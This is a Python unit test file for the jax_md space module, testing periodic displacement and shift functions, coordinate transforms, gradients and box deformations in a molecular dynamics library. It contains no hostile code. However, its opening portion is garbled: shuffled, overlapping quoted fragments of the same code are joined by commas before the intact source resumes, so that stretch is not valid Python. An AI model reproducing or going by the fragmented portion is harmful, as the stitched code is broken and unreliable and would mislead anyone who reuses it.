split2 = random.split(key, 3) R = random.normal( split1, (PARTICLE_COUNT,", "@parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype': dtype, }", "R_shift.dtype == R.dtype assert jnp.all(R_shift < 1.0) assert jnp.all(R_shift >", "in BOX_FORMATS)) def test_periodic_general_energy(self, spatial_dimension, dtype, box_format): N = 16", "jnp.sum(disp_fn(R, R) ** 2)) general_grad_fn = grad(lambda R: jnp.sum(general_disp_fn(R, R)", "= max_box_size * random.uniform( split1, (spatial_dimension,), dtype=dtype) transform = jnp.diag(box_size)", "def make_periodic_general_test_system(N, dim, dtype, box_format): assert box_format in BOX_FORMATS box_size", "dtype=dtype) T = random.normal( split2, (spatial_dimension, spatial_dimension), dtype=dtype) T_inv =", "make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) deformed_box = box * 0.9 self.assertAllClose(grad(E_gf)(R_f,", "T_1 = jnp.array(size_1 * (eye + dtransform_1), dtype=dtype) disp_fn, shift_fn", "WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", "= space.map_product(true_disp_fn) R = random.uniform( split_R, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR", "self.assertAllClose(grad_direct, grad_indirect) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype':", "1e-13 if dtype is f32: tol = 2e-5 for _", "for the specific language governing permissions and # limitations under", "(PARTICLE_COUNT, spatial_dimension), dtype=dtype) self.assertAllClose( disp_fn(R, R), jnp.array(true_disp_fn(R, R), dtype=dtype)) self.assertAllClose(", "SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_against_periodic_general_grad(self, spatial_dimension, dtype): key", "dtype in POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_energy(self, spatial_dimension,", "shift_fn(R_scaled, dR), general_shift_fn(R, dR) * box_size) assert shift_fn(R_scaled, dR).dtype ==", "random.PRNGKey(0) R_f = random.uniform(key, (N, dim), dtype=dtype) R = space.transform(box,", "required by applicable law or agreed to in writing, software", "random.normal(split1, (PARTICLE_COUNT, spatial_dimension)) T = random.normal(split2, (spatial_dimension, spatial_dimension)) R_prime =", "space.map_product(displacement) for _ in range(SHIFT_STEPS): key, split = random.split(key) dR", "in SPATIAL_DIMENSION)) def test_transform_grad(self, spatial_dimension): key = random.PRNGKey(0) for _", "BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either", "dT + jnp.transpose(dT) R = random.uniform( split_R, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)", "in POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_shift(self, spatial_dimension, dtype,", "= 1e-13 if dtype is f32: tol = 1e-5 for", "in range(STOCHASTIC_SAMPLES): key, split1, split2, split3 = random.split(key, 4) max_box_size", "for dtype in POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_grad_box(self,", "range(STOCHASTIC_SAMPLES): key, split = random.split(key) R = random.uniform( split, (PARTICLE_COUNT,", "else: POSITION_DTYPE = [f32] def make_periodic_general_test_system(N, dim, dtype, box_format): assert", "for dtype in POSITION_DTYPE)) def test_periodic_shift(self, spatial_dimension, dtype): key =", "agreed to in writing, software # distributed under the License", "disp_fn(R_scaled, R_scaled).dtype == dtype self.assertAllClose( shift_fn(R_scaled, dR), general_shift_fn(R, dR) *", "random.PRNGKey(0) tol = 1e-13 if dtype is f32: tol =", "distributed under the License is distributed on an \"AS IS\"", "space.periodic_general(jnp.eye(spatial_dimension)) metric = space.metric(displacement) test_metric = space.canonicalize_displacement_or_metric(displacement) metric = space.map_product(metric)", "as jtu from jax_md import space, test_util, quantity, energy from", "E_gf), (s_g, E_g) = \\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) self.assertAllClose(E(R),", "space.periodic(box_size) general_disp_fn, general_shift_fn = space.periodic_general(transform) disp_fn = space.map_product(disp_fn) general_disp_fn =", "= space.distance(dR) dr_direct = jnp.reshape(dr_direct, dr_direct.shape + (1,)) if spatial_dimension", "SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_shift(self, spatial_dimension, dtype): key", "= space.map_product(disp_fn) true_disp_fn = space.map_product(true_disp_fn) R = random.uniform( split_R, (PARTICLE_COUNT,", "spatial_dimension, dtype, box_format) deformed_box = box * 0.9 self.assertAllClose(grad(E_gf)(R_f, box=deformed_box),", "self.assertAllClose( shift_fn(R_scaled, dR), general_shift_fn(R, dR) * box_size) assert shift_fn(R_scaled, dR).dtype", "key = random.PRNGKey(0) displacement, _ = space.periodic_general(jnp.eye(spatial_dimension)) metric = space.metric(displacement)", "self.assertAllClose(R_prime_exact, R_prime) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}'.format(dim), 'spatial_dimension': dim } for", "for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_transform_inverse(self,", "jax_config from jax import random import jax.numpy as jnp from", "in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_transform_inverse(self, spatial_dimension, dtype):", "dtype in POSITION_DTYPE)) def test_periodic_against_periodic_general(self, spatial_dimension, dtype): key = random.PRNGKey(0)", "0.9 self.assertAllClose(E_gf(R_f, box=deformed_box), E_g(R, new_box=deformed_box)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension':", "metric = space.map_product(metric) test_metric = space.map_product(test_metric) for _ in range(STOCHASTIC_SAMPLES):", "grad(energy_direct)(R_prime) grad_indirect = grad(energy_indirect, 1)(T, R) self.assertAllClose(grad_direct, grad_indirect) @parameterized.named_parameters(jtu.cases_from_list( {", "box=T_1) disp_fn = space.map_product(disp_fn) true_disp_fn = space.map_product(true_disp_fn) R = random.uniform(", "= space.map_product(disp_fn) general_disp_fn = space.map_product(general_disp_fn) self.assertAllClose(disp_fn(R_scaled, R_scaled), general_disp_fn(R, R)) assert", "raise SkipTest('Scalar case fails due to JAX Issue #5849.') N", "space.transform(T, R) self.assertAllClose(R_prime_exact, R_prime) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}'.format(dim), 'spatial_dimension': dim", "= dtype(box_size) if box_format == 'vector': box = jnp.array(jnp.ones(dim) *", "dim in SPATIAL_DIMENSION)) def test_transform_grad(self, spatial_dimension): key = random.PRNGKey(0) for", "split3, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) disp_fn, shift_fn = space.periodic(box_size) general_disp_fn, general_shift_fn", "random.uniform( split_R, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR = random.normal( split_dR, (PARTICLE_COUNT,", "= eye + dT + jnp.transpose(dT) R = random.uniform( split_R,", "POSITION_DTYPE)) def test_periodic_against_periodic_general(self, spatial_dimension, dtype): key = random.PRNGKey(0) tol =", "space.periodic_general(box) d_g, s_g = space.periodic_general(box, fractional_coordinates=False) key = random.PRNGKey(0) R_f", "space.periodic_shift(f32(1.0), R, dR) assert R_shift.dtype == R.dtype assert jnp.all(R_shift <", "self.assertAllClose(dR_after, dR) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype':", "due to JAX Issue #5849.') N = 16 R_f, R,", "dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_shift(self, spatial_dimension,", "in range(SHIFT_STEPS): key, split = random.split(key) dR = random.normal( split,", "(spatial_dimension, spatial_dimension), dtype=dtype) T = eye + dT + jnp.transpose(dT)", "i in range(-1, 2): for j in range(-1, 2): for", "= jit(energy.soft_sphere_pair(d_g)) return R_f, R, box, (s, E), (s_gf, E_gf),", "under the License. \"\"\"Tests for jax_md.space.\"\"\" from absl.testing import absltest", "R_gf_new = s_gf(R_f, grad(E_gf)(R_f)) R_g_new = s_g(R, grad(E_g)(R)) self.assertAllClose(R_new, space.transform(box,", "(PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR = random.normal( split_dR, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)", "jnp.sqrt(f32(0.1)) * random.normal( split2, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR = jnp.where(dR", "= random.split(key, 3) dT = random.normal( split_T, (spatial_dimension, spatial_dimension), dtype=dtype)", "\\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) R_new = s(R, grad(E)(R)) R_gf_new", "quantity, energy from jax_md.util import * from functools import partial", "dr_direct) elif spatial_dimension == 3: for i in range(-1, 2):", "dtype=dtype) R = shift(R, dR) unwrapped_R = unwrapped_shift(unwrapped_R, dR) self.assertAllClose(", "OR CONDITIONS OF ANY KIND, either express or implied. #", "T = random.normal( split2, (spatial_dimension, spatial_dimension), dtype=dtype) T_inv = space.inverse(T)", "def test_periodic_general_shift(self, spatial_dimension, dtype, box_format): N = 16 R_f, R,", "for box_format in BOX_FORMATS)) def test_periodic_general_deform_grad(self, spatial_dimension, dtype, box_format): N", "the License is distributed on an \"AS IS\" BASIS, #", "f32: tol = 2e-5 for _ in range(STOCHASTIC_SAMPLES): key, split_R,", "random.normal( split_T0_dT, (spatial_dimension, spatial_dimension)) T_0 = jnp.array(size_0 * (eye +", "transform = jnp.diag(box_size) R = random.uniform( split2, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)", "pylint: disable=g-complex-comprehension @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype':", "dr_direct, dR_shifted, dR_direct) dr_direct = jnp.where( dr_shifted < dr_direct, dr_shifted,", "jax.numpy as jnp from jax import grad, jit, jacfwd from", "jnp.reshape(dr_direct, dr_direct.shape + (1,)) if spatial_dimension == 2: for i", "lambda R: jnp.sum(R ** 2) energy_indirect = lambda T, R:", "for dtype in POSITION_DTYPE)) def test_canonicalize_displacement_or_metric(self, spatial_dimension, dtype): key =", "+ (1,)) dR_direct = jnp.where(dr_shifted < dr_direct, dR_shifted, dR_direct) dr_direct", "self.assertAllClose(grad(E)(R), grad(E_g)(R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype': dtype,", "law or agreed to in writing, software # distributed under", "grad(E_gf)(R_f)) self.assertAllClose(grad(E)(R), grad(E_g)(R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype':", "R = space.transform(box, R_f) E = jit(energy.soft_sphere_pair(d)) E_gf = jit(energy.soft_sphere_pair(d_gf))", "box, (s, E), (s_gf, E_gf), (s_g, E_g) # pylint: disable=invalid-name", "T, R), dtype=dtype) R_prime = space.transform(T, R) self.assertAllClose(R_prime_exact, R_prime) @parameterized.named_parameters(jtu.cases_from_list(", "for _ in range(STOCHASTIC_SAMPLES): key, split_T0_scale, split_T0_dT = random.split(key, 3)", "test_periodic_general_energy(self, spatial_dimension, dtype, box_format): N = 16 R_f, R, box,", "< dr_direct, dr_shifted, dr_direct) dR_direct = jnp.array(dR_direct, dtype=dR.dtype) assert dR_wrapped.dtype", "range(SHIFT_STEPS): key, split = random.split(key) dR = random.normal( split, (PARTICLE_COUNT,", "dtype=dtype) T = random.normal( split2, (spatial_dimension, spatial_dimension), dtype=dtype) R_prime_exact =", "if box_format == 'matrix' else box) d_gf, s_gf = space.periodic_general(box)", "may obtain a copy of the License at # #", "test_periodic_shift(self, spatial_dimension, dtype): key = random.PRNGKey(0) for _ in range(STOCHASTIC_SAMPLES):", "\\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) deformed_box = box * 0.9", "grad, jit, jacfwd from jax import test_util as jtu from", "split_t, split_R, split_dR = random.split(key, 4) size_0 = 10.0 *", "is f32: tol = 1e-5 for _ in range(STOCHASTIC_SAMPLES): key,", "in SPATIAL_DIMENSION for dtype in POSITION_DTYPE for box_format in BOX_FORMATS))", "split2, (spatial_dimension, spatial_dimension), dtype=dtype) R_prime_exact = jnp.array(jnp.einsum('ij,kj->ki', T, R), dtype=dtype)", "may not use this file except in compliance with the", "s_g(R, grad(E_g)(R), new_box=deformed_box) R_gf_new = space.transform(deformed_box, s_gf(R_f, grad(E_gf)(R_f))) self.assertAllClose(R_new, R_gf_new)", "dr_shifted = space.distance(dR_shifted) dr_shifted = jnp.reshape(dr_shifted, dr_shifted.shape + (1,)) dR_direct", "R), dtype=dtype) R_prime = space.transform(T, R) self.assertAllClose(R_prime_exact, R_prime) @parameterized.named_parameters(jtu.cases_from_list( {", "E_g(R, new_box=box) @grad def box_energy_gf_fn(box): return E_gf(R_f, box=box) self.assertAllClose(box_energy_g_fn(box), box_energy_gf_fn(box))", "space, test_util, quantity, energy from jax_md.util import * from functools", "this file except in compliance with the License. # You", "test_transform_grad(self, spatial_dimension): key = random.PRNGKey(0) for _ in range(STOCHASTIC_SAMPLES): key,", "spatial_dimension), dtype=dtype) T_inv = space.inverse(T) R_test = space.transform(T_inv, space.transform(T, R))", "import SkipTest test_util.update_test_tolerance(5e-5, 5e-13) jax_config.parse_flags_with_absl() jax_config.enable_omnistaging() FLAGS = jax_config.FLAGS PARTICLE_COUNT", "range(-1, 2): dR_shifted = dR + jnp.array([i, j, k], dtype=R.dtype)", "# # Licensed under the Apache License, Version 2.0 (the", "in range(-1, 2): dR_shifted = dR + jnp.array([i, j, k],", "on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS", "jnp.eye(spatial_dimension, dtype=dtype) tol = 1e-13 if dtype is f32: tol", "spatial_dimension), dtype=dtype) dR = jnp.sqrt(f32(0.1)) * random.normal( split2, (PARTICLE_COUNT, spatial_dimension),", "space.map_product(disp_fn) true_disp_fn = space.map_product(true_disp_fn) R = random.uniform( split_R, (PARTICLE_COUNT, spatial_dimension),", "= jnp.reshape(dr_shifted, dr_shifted.shape + (1,)) dR_direct = jnp.where( dr_shifted <", "dim } for dim in SPATIAL_DIMENSION)) def test_transform_grad(self, spatial_dimension): key", "= random.uniform( split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR = jnp.sqrt(f32(0.1)) *", "= random.PRNGKey(0) eye = jnp.eye(spatial_dimension, dtype=dtype) tol = 1e-13 if", "space.inverse(T) R_test = space.transform(T_inv, space.transform(T, R)) self.assertAllClose(R, R_test) @parameterized.named_parameters(jtu.cases_from_list( {", "general_disp_fn = space.map_product(general_disp_fn) self.assertAllClose(disp_fn(R_scaled, R_scaled), general_disp_fn(R, R)) assert disp_fn(R_scaled, R_scaled).dtype", "new_box=deformed_box)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype': dtype, 'box_format':", "dtype in POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_deform_shift(self, spatial_dimension,", "make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) self.assertAllClose(grad(E)(R), grad(E_gf)(R_f)) self.assertAllClose(grad(E)(R), grad(E_g)(R)) @parameterized.named_parameters(jtu.cases_from_list( {", "or implied. # See the License for the specific language", "dtype=dtype) self.assertAllClose(metric(R, R), test_metric(R, R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),", "split_dR = random.split(key, 4) size_0 = 10.0 * random.uniform(split_T0_scale, ())", "box_format) self.assertAllClose(grad(E)(R), grad(E_gf)(R_f)) self.assertAllClose(grad(E)(R), grad(E_g)(R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension':", "+ dtransform_0), dtype=dtype) size_1 = 10.0 * random.uniform(split_T1_scale, (), dtype=dtype)", "as jax_config from jax import random import jax.numpy as jnp", "split_T1_dT = random.split(key, 3) key, split_t, split_R, split_dR = random.split(key,", "dim, dtype, box_format): assert box_format in BOX_FORMATS box_size = quantity.box_size_at_number_density(N,", "POSITION_DTYPE)) def test_periodic_displacement(self, spatial_dimension, dtype): key = random.PRNGKey(0) for _", "0.5 * random.normal( split_T0_dT, (spatial_dimension, spatial_dimension)) T_0 = jnp.array(size_0 *", "general_disp_fn(R, R)) assert disp_fn(R_scaled, R_scaled).dtype == dtype self.assertAllClose( shift_fn(R_scaled, dR),", "()) dtransform_0 = 0.5 * random.normal( split_T0_dT, (spatial_dimension, spatial_dimension)) T_0", "disp_fn = partial(disp_fn, box=T_1) disp_fn = space.map_product(disp_fn) true_disp_fn = space.map_product(true_disp_fn)", "= [2, 3] BOX_FORMATS = ['scalar', 'vector', 'matrix'] if FLAGS.jax_enable_x64:", "for jax_md.space.\"\"\" from absl.testing import absltest from absl.testing import parameterized", "POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_deform_grad(self, spatial_dimension, dtype, box_format):", "f32: tol = 1e-5 for _ in range(STOCHASTIC_SAMPLES): key, split1,", "def test_periodic_general_deform(self, spatial_dimension, dtype, box_format): N = 16 R_f, R,", "random.uniform( split1, (spatial_dimension,), dtype=dtype) transform = jnp.diag(box_size) R = random.uniform(", "= random.uniform( split_R, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) R0 = R unwrapped_R", "dR_direct = jnp.array(dR_direct, dtype=dR.dtype) assert dR_wrapped.dtype == dtype self.assertAllClose(dR_wrapped, dR_direct)", "displacement(unwrapped_R, R0)) assert not (jnp.all(unwrapped_R > 0) and jnp.all(unwrapped_R <", "jacfwd(E_g)(R, new_box=deformed_box)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype': dtype,", "j], dtype=R.dtype) dr_shifted = space.distance(dR_shifted) dr_shifted = jnp.reshape(dr_shifted, dr_shifted.shape +", "dR_shifted, dR_direct) dr_direct = jnp.where( dr_shifted < dr_direct, dr_shifted, dr_direct)", "def test_periodic_against_periodic_general_grad(self, spatial_dimension, dtype): key = random.PRNGKey(0) tol = 1e-13", "shift_fn = space.periodic(box_size) general_disp_fn, general_shift_fn = space.periodic_general(transform) disp_fn = space.map_product(disp_fn)", "E_g = jit(energy.soft_sphere_pair(d_g)) return R_f, R, box, (s, E), (s_gf,", "= space.metric(displacement) test_metric = space.canonicalize_displacement_or_metric(displacement) metric = space.map_product(metric) test_metric =", "for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_against_periodic_general(self,", "self.assertAllClose(dR_wrapped, dR_direct) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype':", "dtype=dtype) dR = space.map_product(space.pairwise_displacement)(R, R) dR_wrapped = space.periodic_displacement(f32(1.0), dR) dR_direct", "E_gf), (s_g, E_g) # pylint: disable=invalid-name class SpaceTest(jtu.JaxTestCase): # pylint:", "self.assertAllClose(grad_fn(R_scaled), general_grad_fn(R)) assert general_grad_fn(R).dtype == dtype @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim,", "= s_g(R, grad(E_g)(R), new_box=deformed_box) R_gf_new = space.transform(deformed_box, s_gf(R_f, grad(E_gf)(R_f))) self.assertAllClose(R_new,", "def box_energy_gf_fn(box): return E_gf(R_f, box=box) self.assertAllClose(box_energy_g_fn(box), box_energy_gf_fn(box)) if __name__ ==", "in BOX_FORMATS)) def test_periodic_general_shift(self, spatial_dimension, dtype, box_format): N = 16", "spatial_dimension, dtype, box_format) deformed_box = box * 0.9 R_new =", "return E_g(R, new_box=box) @grad def box_energy_gf_fn(box): return E_gf(R_f, box=box) self.assertAllClose(box_energy_g_fn(box),", "general_grad_fn(R)) assert general_grad_fn(R).dtype == dtype @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),", "test_periodic_general_grad_box(self, spatial_dimension, dtype, box_format): if box_format == 'scalar': raise SkipTest('Scalar", "<reponame>hadrianmontes/jax-md<gh_stars>100-1000 # Copyright 2019 Google LLC # # Licensed under", "dR_direct) dr_direct = jnp.where(dr_shifted < dr_direct, dr_shifted, dr_direct) elif spatial_dimension", "* 0.9 R_new = s_g(R, grad(E_g)(R), new_box=deformed_box) R_gf_new = space.transform(deformed_box,", "10.0 * random.uniform(split_T1_scale, (), dtype=dtype) dtransform_1 = 0.5 * random.normal(", "= random.normal( split_T, (spatial_dimension, spatial_dimension), dtype=dtype) T = eye +", "test_metric = space.map_product(test_metric) for _ in range(STOCHASTIC_SAMPLES): key, split1, split2", "= \\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) deformed_box = box *", "space.periodic_general(T_0) true_disp_fn, true_shift_fn = space.periodic_general(T_1) disp_fn = partial(disp_fn, box=T_1) disp_fn", "spatial_dimension), dtype=dtype) R0 = R unwrapped_R = R displacement, shift", "SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_displacement(self, spatial_dimension, dtype): key", "in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_against_periodic_general_grad(self, spatial_dimension, dtype):", "@grad def box_energy_g_fn(box): return E_g(R, new_box=box) @grad def box_energy_gf_fn(box): return", "copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # #", "Google LLC # # Licensed under the Apache License, Version", "(s, E), (s_gf, E_gf), (s_g, E_g) = \\ make_periodic_general_test_system(N, spatial_dimension,", "grad(E_gf)(R_f)) R_g_new = s_g(R, grad(E_g)(R)) self.assertAllClose(R_new, space.transform(box, R_gf_new)) self.assertAllClose(R_new, R_g_new)", "* random.uniform(split_T1_scale, (), dtype=dtype) dtransform_1 = 0.5 * random.normal( split_T1_dT,", "in writing, software # distributed under the License is distributed", "split_T = random.split(key, 3) dT = random.normal( split_T, (spatial_dimension, spatial_dimension),", "< 1)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype': dtype,", "dtype=R.dtype) dr_shifted = space.distance(dR_shifted) dr_shifted = jnp.reshape(dr_shifted, dr_shifted.shape + (1,))", "'vector', 'matrix'] if FLAGS.jax_enable_x64: POSITION_DTYPE = [f32, f64] else: POSITION_DTYPE", "f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype': dtype, 'box_format': box_format } for dim", "= space.transform(T, R) self.assertAllClose(R_prime_exact, R_prime) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}'.format(dim), 'spatial_dimension':", "space.periodic_displacement(f32(1.0), dR) dR_direct = dR dr_direct = space.distance(dR) dr_direct =", "jax_md import space, test_util, quantity, energy from jax_md.util import *", "License is distributed on an \"AS IS\" BASIS, # WITHOUT", "License, Version 2.0 (the \"License\"); # you may not use", "general_shift_fn = space.periodic_general(transform) disp_fn = space.map_product(disp_fn) general_disp_fn = space.map_product(general_disp_fn) grad_fn", "= random.normal( split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) T = random.normal( split2,", "1e-5 for _ in range(STOCHASTIC_SAMPLES): key, split1, split2 = random.split(key,", "tol = 1e-13 if dtype is f32: tol = 1e-5", "dtype @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype': dtype,", "in POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_deform_shift(self, spatial_dimension, dtype,", "SPATIAL_DIMENSION = [2, 3] BOX_FORMATS = ['scalar', 'vector', 'matrix'] if", "dim) box = dtype(box_size) if box_format == 'vector': box =", "as jnp from jax import grad, jit, jacfwd from jax", "the License for the specific language governing permissions and #", "self.assertAllClose(E_gf(R_f, box=deformed_box), E_g(R, new_box=deformed_box)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim,", "R_f = random.uniform(key, (N, dim), dtype=dtype) R = space.transform(box, R_f)", "dR), dtype=dtype)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype':", "dtype in POSITION_DTYPE)) def test_transform_inverse(self, spatial_dimension, dtype): key = random.PRNGKey(0)", "_ in range(STOCHASTIC_SAMPLES): key, split = random.split(key) R = random.uniform(", "key, split1, split2, split3 = random.split(key, 4) max_box_size = f32(10.0)", "= jnp.array(jnp.einsum('ij,kj->ki', T, R), dtype=dtype) R_prime = space.transform(T, R) self.assertAllClose(R_prime_exact,", "(spatial_dimension,), dtype=dtype) transform = jnp.diag(box_size) R = random.uniform( split2, (PARTICLE_COUNT,", "random.uniform( split, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR = space.map_product(space.pairwise_displacement)(R, R) dR_wrapped", "@parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype': dtype, 'box_format': box_format", "* box_size, dtype) elif box_format == 'matrix': box = jnp.array(jnp.eye(dim)", "= space.periodic_displacement(f32(1.0), dR) dR_direct = dR dr_direct = space.distance(dR) dr_direct", "box_format in BOX_FORMATS box_size = quantity.box_size_at_number_density(N, 1.0, dim) box =", "BOX_FORMATS box_size = quantity.box_size_at_number_density(N, 1.0, dim) box = dtype(box_size) if", "1e-13 if dtype is f32: tol = 1e-5 for _", "2)) general_grad_fn = grad(lambda R: jnp.sum(general_disp_fn(R, R) ** 2)) self.assertAllClose(grad_fn(R_scaled),", "dtype in POSITION_DTYPE)) def test_periodic_displacement(self, spatial_dimension, dtype): key = random.PRNGKey(0)", "spatial_dimension), dtype=dtype) T = random.normal( split2, (spatial_dimension, spatial_dimension), dtype=dtype) R_prime_exact", "from jax import random import jax.numpy as jnp from jax", "in range(-1, 2): for j in range(-1, 2): dR_shifted =", "3) R = random.normal( split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) T =", "in range(STOCHASTIC_SAMPLES): key, split1, split2 = random.split(key, 3) R =", "'scalar': raise SkipTest('Scalar case fails due to JAX Issue #5849.')", "'dtype': dtype, } for dim in SPATIAL_DIMENSION for dtype in", "in range(STOCHASTIC_SAMPLES): key, split = random.split(key) R = random.uniform( split,", "assert jnp.all(R_shift < 1.0) assert jnp.all(R_shift > 0.0) dR_after =", "dr_shifted < dr_direct, dr_shifted, dr_direct) dR_direct = jnp.array(dR_direct, dtype=dR.dtype) assert", "# Copyright 2019 Google LLC # # Licensed under the", "# distributed under the License is distributed on an \"AS", "# Unless required by applicable law or agreed to in", "dtype=dtype) R_prime_exact = jnp.array(jnp.einsum('ij,kj->ki', T, R), dtype=dtype) R_prime = space.transform(T,", "\"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY", "R) ** 2)) self.assertAllClose(grad_fn(R_scaled), general_grad_fn(R)) assert general_grad_fn(R).dtype == dtype @parameterized.named_parameters(jtu.cases_from_list(", "random.normal(split2, (spatial_dimension, spatial_dimension)) R_prime = space.transform(T, R) energy_direct = lambda", "random.uniform( split_R, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) R0 = R unwrapped_R =", "= jnp.sqrt(f32(0.1)) * random.normal( split2, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR =", "for dtype in POSITION_DTYPE)) def test_transform(self, spatial_dimension, dtype): key =", "dtype=dtype) T = eye + dT + jnp.transpose(dT) R =", "= unwrapped_shift(unwrapped_R, dR) self.assertAllClose( displacement(R, R0), displacement(unwrapped_R, R0)) assert not", "absltest from absl.testing import parameterized from jax.config import config as", "spatial_dimension, dtype): key = random.PRNGKey(0) eye = jnp.eye(spatial_dimension, dtype=dtype) tol", "the Apache License, Version 2.0 (the \"License\"); # you may", "space.map_product(metric) test_metric = space.map_product(test_metric) for _ in range(STOCHASTIC_SAMPLES): key, split1,", "limitations under the License. \"\"\"Tests for jax_md.space.\"\"\" from absl.testing import", "dtype=dtype) dtransform_1 = 0.5 * random.normal( split_T1_dT, (spatial_dimension, spatial_dimension), dtype=dtype)", "SkipTest('Scalar case fails due to JAX Issue #5849.') N =", "dtype, box_format) deformed_box = box * 0.9 self.assertAllClose(E_gf(R_f, box=deformed_box), E_g(R,", "POSITION_DTYPE = [f32] def make_periodic_general_test_system(N, dim, dtype, box_format): assert box_format", "dim, 'dtype': dtype, } for dim in SPATIAL_DIMENSION for dtype", "space.periodic_general(T_1) disp_fn = partial(disp_fn, box=T_1) disp_fn = space.map_product(disp_fn) true_disp_fn =", "random.split(key, 3) dT = random.normal( split_T, (spatial_dimension, spatial_dimension), dtype=dtype) T", "'matrix': box = jnp.array(jnp.eye(dim) * box_size, dtype) d, s =", "split2, split3 = random.split(key, 4) max_box_size = f32(10.0) box_size =", "R = random.uniform( split, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR = space.map_product(space.pairwise_displacement)(R,", "R: jnp.sum(space.transform(T, R) ** 2) grad_direct = grad(energy_direct)(R_prime) grad_indirect =", "= R unwrapped_R = R displacement, shift = space.periodic_general(T) _,", "(spatial_dimension, spatial_dimension), dtype=dtype) T_inv = space.inverse(T) R_test = space.transform(T_inv, space.transform(T,", "def test_periodic_displacement(self, spatial_dimension, dtype): key = random.PRNGKey(0) for _ in", "box_format) R_new = s(R, grad(E)(R)) 